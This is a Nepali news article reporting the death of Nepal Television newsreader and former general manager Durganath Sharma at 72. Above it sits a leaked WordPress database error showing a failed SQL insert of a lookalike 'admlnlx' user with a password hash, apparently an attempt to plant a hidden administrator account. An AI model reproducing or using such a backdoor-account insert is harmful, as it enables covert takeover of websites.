WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bc8aIcP3/ElVYSZ9EVniQa/nSEjRTr0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-11 03:39:54', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । पत्रकार दुर्गानाथ शर्माको आज ७२ वर्षको उमेरमा निधन भएको छ ।
नेपाल टेलिभिजनको स्थापना कालदेखि लामो समयसम्म समाचारवाचक र कार्यक्रम प्रस्तोताको रुपमा काम गरेका शर्माको काठमाडौं महाराजगञ्जको मनमोहन कार्डियोथोरासिक भास्कुलर एण्ड ट्रान्सप्लान्ट सेन्टरमा निधन भएको हो ।
शर्मा मुटुसम्बन्धी समस्याबाट पीडित थिए । मंगलबार शहीद गंगालाल राष्ट्रिय हृदयरोग केन्द्रमा भर्ना भएका उनलाई मंगलबार राति मनमोहनमा सारिएको थियो ।
२०४२ सालमा नेपाल टेलिभिजनको प्रशारण सुरु हुँदादेखि काम गरेका शर्माले टेलिभिजनको महाप्रबन्धकसम्म भई काम गरेका थिए । शर्माले सुरु गरेको विश्वघटना नामक कार्यक्रम चर्चित थियो ।